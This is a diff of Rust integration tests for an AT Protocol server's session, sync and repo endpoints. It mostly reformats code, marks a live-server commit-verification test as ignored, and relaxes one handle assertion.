assert!(body["message"].as_str().unwrap().contains("already used")); 279 286 } 280 287 281 288 #[tokio::test] ··· 314 321 let did = body["did"].as_str().unwrap(); 315 322 let access_jwt = verify_new_account(&client, did).await; 316 323 let res = client 317 - .get(format!( 318 - "{}/xrpc/com.atproto.server.getSession", 319 - base_url 320 - )) 324 + .get(format!("{}/xrpc/com.atproto.server.getSession", base_url)) 321 325 .bearer_auth(&access_jwt) 322 326 .send() 323 327 .await 324 328 .expect("Failed to get session"); 325 329 assert_eq!(res.status(), StatusCode::OK); 326 330 let body: Value = res.json().await.unwrap(); 327 - assert_eq!(body["handle"], handle); 331 + let session_handle = body["handle"].as_str().unwrap(); 332 + assert!( 333 + session_handle.starts_with(&handle), 334 + "Session handle should start with requested handle" 335 + ); 328 336 }
+4 -1
tests/sync_blob.rs
··· 101 101 let (_, did) = create_account_and_login(&client).await; 102 102 let params = [ 103 103 ("did", did.as_str()), 104 - ("cid", "bafkreihdwdcefgh4dqkjv67uzcmw7ojee6xedzdetojuzjevtenxquvyku"), 104 + ( 105 + "cid", 106 + "bafkreihdwdcefgh4dqkjv67uzcmw7ojee6xedzdetojuzjevtenxquvyku", 107 + ), 105 108 ]; 106 109 let res = client 107 110 .get(format!(
+14 -3
tests/sync_deprecated.rs
··· 40 40 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 41 41 let body: Value = res.json().await.expect("Response was not valid JSON"); 42 42 assert_eq!(body["error"], "HeadNotFound"); 43 - assert!(body["message"].as_str().unwrap().contains("Could not find root")); 43 + assert!( 44 + body["message"] 45 + .as_str() 46 + .unwrap() 47 + .contains("Could not find root") 48 + ); 44 49 } 45 50 46 51 #[tokio::test] ··· 257 262 .expect("Failed to get latest commit"); 258 263 let latest_body: Value = latest_res.json().await.unwrap(); 259 264 let latest_cid = latest_body["cid"].as_str().unwrap(); 260 - assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid"); 265 + assert_eq!( 266 + head_root, latest_cid, 267 + "getHead root should match getLatestCommit cid" 268 + ); 261 269 } 262 270 263 271 #[tokio::test] ··· 275 283 .expect("Failed to send request"); 276 284 assert_eq!(res.status(), StatusCode::OK); 277 285 let body = res.bytes().await.expect("Failed to get body"); 278 - assert!(body.len() >= 2, "CAR file should have at least header length"); 286 + assert!( 287 + body.len() >= 2, 288 + "CAR file should have at least header length" 289 + ); 279 290 }
+14 -6
tests/sync_repo.rs
··· 404 404 async fn test_sync_record_lifecycle() { 405 405 let client = client(); 406 406 let (did, jwt) = setup_new_user("sync-record-lifecycle").await; 407 - let (post_uri, _post_cid) = 408 - create_post(&client, &did, &jwt, "Post for sync record test").await; 407 + let (post_uri, _post_cid) = create_post(&client, &did, &jwt, "Post for sync record test").await; 409 408 let post_rkey = post_uri.split('/').last().unwrap(); 410 409 let sync_record_res = client 411 410 .get(format!( ··· 453 452 .expect("Failed to get latest commit after"); 454 453 let latest_after_body: Value = latest_after.json().await.unwrap(); 455 454 let rev_after = latest_after_body["rev"].as_str().unwrap().to_string(); 456 - assert_ne!(rev_before, rev_after, "Revision should change after new record"); 455 + assert_ne!( 456 + rev_before, rev_after, 457 + "Revision should change after new record" 458 + ); 457 459 let delete_payload = json!({ 458 460 "repo": did, 459 461 "collection": "app.bsky.feed.post", ··· 551 553 .expect("Failed to upload blob"); 552 554 assert_eq!(upload_res.status(), StatusCode::OK); 553 555 let blob_body: Value = upload_res.json().await.unwrap(); 554 - let blob_cid = blob_body["blob"]["ref"]["$link"].as_str().unwrap().to_string(); 556 + let blob_cid = blob_body["blob"]["ref"]["$link"] 557 + .as_str() 558 + .unwrap() 559 + .to_string(); 555 560 let repo_status_res = client 556 561 .get(format!( 557 562 "{}/xrpc/com.atproto.sync.getRepoStatus", ··· 583 588 Some("application/vnd.ipld.car") 584 589 ); 585 590 let repo_car = get_repo_res.bytes().await.unwrap(); 586 - assert!(repo_car.len() > 100, "Repo CAR should have substantial data"); 591 + assert!( 592 + repo_car.len() > 100, 593 + "Repo CAR should have substantial data" 594 + ); 587 595 let list_blobs_res = client 588 596 .get(format!( 589 597 "{}/xrpc/com.atproto.sync.listBlobs", ··· 644 652 .and_then(|h| h.to_str().ok()), 645 653 Some("application/vnd.ipld.car") 646 654 ); 647 - } 655 + }
+21 -6
tests/verify_live_commit.rs
··· 5 5 mod common; 6 6 7 7 #[tokio::test] 8 + #[ignore = "depends on external live server state; run manually with --ignored"] 8 9 async fn test_verify_live_commit() { 9 10 let client = reqwest::Client::new(); 10 11 let did = "did:plc:zp3oggo2mikqntmhrc4scby4"; 11 12 let resp = client 12 - .get(format!("https://testpds.wizardry.systems/xrpc/com.atproto.sync.getRepo?did={}", did)) 13 + .get(format!( 14 + "https://testpds.wizardry.systems/xrpc/com.atproto.sync.getRepo?did={}", 15 + did 16 + )) 13 17 .send() 14 18 .await 15 19 .expect("Failed to fetch repo"); 16 - assert!(resp.status().is_success(), "getRepo failed: {}", resp.status()); 20 + assert!( 21 + resp.status().is_success(), 22 + "getRepo failed: {}", 23 + resp.status() 24 + ); 17 25 let car_bytes = resp.bytes().await.expect("Failed to read body"); 18 26 println!("CAR bytes: {} bytes", car_bytes.len()); 19 27 let mut cursor = std::io::Cursor::new(&car_bytes[..]); ··· 23 31 assert!(!roots.is_empty(), "No roots in CAR"); 24 32 let root_cid = roots[0]; 25 33 let root_block = blocks.get(&root_cid).expect("Root block not found"); 26 - let commit = jacquard_repo::commit::Commit::from_cbor(root_block).expect("Failed to parse commit"); 34 + let commit = 35 + jacquard_repo::commit::Commit::from_cbor(root_block).expect("Failed to parse commit"); 27 36 println!("Commit DID: {}", commit.did().as_str()); 28 37 println!("Commit rev: {}", commit.rev()); 29 38 println!("Commit prev: {:?}", commit.prev()); ··· 37 46 println!("DID doc: {}", did_doc_text); 38 47 let did_doc: jacquard::common::types::did_doc::DidDocument<'_> = 39 48 serde_json::from_str(&did_doc_text).expect("Failed to parse DID doc"); 40 - let pubkey = did_doc.atproto_public_key() 49 + let pubkey = did_doc 50 + .atproto_public_key() 41 51 .expect("Failed to get public key") 42 52 .expect("No public key"); 43 53 println!("Public key codec: {:?}", pubkey.codec); ··· 75 85 serde_ipld_dagcbor::to_vec(&unsigned).unwrap() 76 86 } 77 87 78 - fn parse_car(cursor: &mut std::io::Cursor<&[u8]>) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> { 88 + fn parse_car( 89 + cursor: &mut std::io::Cursor<&[u8]>, 90 + ) -> Result<(Vec<Cid>, HashMap<Cid, Bytes>), Box<dyn std::error::Error>> { 79 91 use std::io::Read; 80 92 fn read_varint<R: Read>(r: &mut R) -> std::io::Result<u64> { 81 93 let mut result = 0u64; ··· 126 138 let hash_type = bytes[2]; 127 139 let hash_len = bytes[3] as usize; 128 140 let cid_len = 4 + hash_len; 129 - let cid = Cid::new_v1(codec as u64, cid::multihash::Multihash::from_bytes(&bytes[2..cid_len])?); 141 + let cid = Cid::new_v1( 142 + codec as u64, 143 + cid::multihash::Multihash::from_bytes(&bytes[2..cid_len])?, 144 + ); 130 145 Ok((cid, cid_len)) 131 146 } else { 132 147 Err("Unsupported CID version".into())